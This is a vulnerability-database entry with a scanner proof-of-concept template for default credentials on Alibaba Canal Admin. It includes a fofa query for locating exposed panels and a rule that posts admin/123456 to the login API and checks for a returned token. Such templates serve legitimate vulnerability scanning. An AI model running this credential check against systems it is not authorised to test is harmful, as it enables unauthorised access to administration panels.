alibaba-canal-default-password: Alibaba Canal Default Password

日期: 2025-08-01 | 影响软件: Alibaba Canal Default Password | POC: 已公开

漏洞描述

An Alibaba Canal default login was discovered. fofa: title="Canal Admin"

PoC代码[已公开]

id: alibaba-canal-default-password

info:
  name: Alibaba Canal Default Password
  author: jweny
  severity: high
  verified: true
  description: |-
    An Alibaba Canal default login was discovered.
    fofa: title="Canal Admin"
  reference:
    - https://github.com/alibaba/canal/wiki/ClientAdapter
    - https://nvd.nist.gov/vuln/detail/CVE-2025-53833
  tags: alibaba,default-login
  created: 2023/06/24

rules:
  r1:
    request:
      method: POST
      path: /api/v1/user/login
      headers:
        Content-Type: application/json
      body: '{"username":"admin","password":"123456"}'
    expression: response.status == 200 && response.body.bcontains(b"{\"code\":20000,") && response.body.bcontains(b"\"data\":{\"token\"")
expression: r1()